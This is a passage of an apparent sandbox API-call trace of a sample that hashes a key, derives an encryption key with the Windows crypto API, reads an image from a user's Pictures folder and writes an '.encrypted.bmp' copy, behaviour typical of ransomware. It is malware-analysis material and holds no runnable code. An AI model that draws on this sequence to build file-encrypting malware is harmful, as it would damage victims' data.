cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0039.639] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0039.639] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0039.639] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.639] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0039.639] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.639] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0039.639] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.639] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0039.639] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0039.640] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0039.640] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.640] CryptHashData (hHash=0x7c2240, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0039.640] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0039.640] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0039.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0039.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0039.640] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.640] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c21c0) returned 1 [0039.640] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0039.640] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.640] CryptDestroyHash (hHash=0x7c2240) returned 1 [0039.640] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt\\a-rptl9rgzl\\4g9fyjo.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0039.640] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.640] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0039.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0039.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0039.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0039.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0039.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0039.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0039.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0039.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0039.641] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0039.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0039.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0039.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0039.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0039.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0039.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0039.641] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0039.641] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0039.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0039.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0039.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0039.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0039.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0039.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0039.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0039.641] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0039.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0039.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0039.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0039.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0039.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0039.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0039.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0039.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0039.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0039.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0039.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0039.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0039.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0039.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0039.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0039.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0039.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0039.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0039.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0039.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc0) returned 0x7c95d0 [0039.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0039.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c38b0 [0039.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0039.642] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c3818 [0039.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c95d0 | out: hHeap=0x770000) returned 1 [0039.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0039.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0039.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0039.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0039.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c38b0 | out: hHeap=0x770000) returned 1 [0039.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0039.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0039.643] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0039.643] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c38b0 [0039.643] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt\\a-rptl9rgzl")) returned 0x10 [0039.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c38b0 | out: hHeap=0x770000) returned 1 [0039.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0039.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c3818 | out: hHeap=0x770000) returned 1 [0039.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0039.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0039.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0039.643] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0039.643] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab0010 [0039.643] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0039.643] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0039.643] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\4g9fyJO.encrypted.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt\\a-rptl9rgzl\\4g9fyjo.encrypted.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0039.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0039.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0039.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0039.645] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0039.645] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0039.645] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0039.645] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0039.645] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0039.645] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.645] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0039.646] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0039.646] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0039.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0039.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0039.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0039.646] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0039.646] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0039.646] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.646] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0039.646] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.646] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0039.646] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0039.646] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0039.646] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0039.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0039.646] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0039.646] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0039.646] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0039.646] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0039.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0039.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.646] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0039.646] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0039.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0039.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0039.647] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0039.647] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0039.647] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x6218, lpOverlapped=0x0) returned 1 [0039.648] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0039.648] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0039.648] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0039.648] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0039.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0039.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x6218) returned 0xac0018 [0039.649] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0039.649] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0039.649] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0039.649] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0039.649] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0039.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0039.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x6218) returned 0xac6238 [0039.649] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac0018 | out: hHeap=0x770000) returned 1 [0039.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0039.651] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0039.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0039.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0039.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0039.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0039.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x6218) returned 0xac0018 [0039.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac0018 | out: hHeap=0x770000) returned 1 [0039.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0039.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0039.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0039.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0039.652] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0039.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0039.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0039.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0039.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0039.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0039.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0039.652] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0039.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0039.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0039.652] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0039.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0039.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0039.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1d8 [0039.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0039.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0039.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0039.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0039.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x6218) returned 0xac0018 [0039.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da188 [0039.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0039.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0039.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0039.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2e8 [0039.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0039.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0039.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0039.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da348 [0039.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0039.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0039.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0039.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8898c8 [0039.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0039.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0039.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0039.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0039.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0039.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x6218) returned 0xacc458 [0039.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0039.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0039.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0039.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0039.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0039.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0039.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0039.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0039.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0039.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0039.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0039.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0039.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0039.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0039.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0039.654] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, 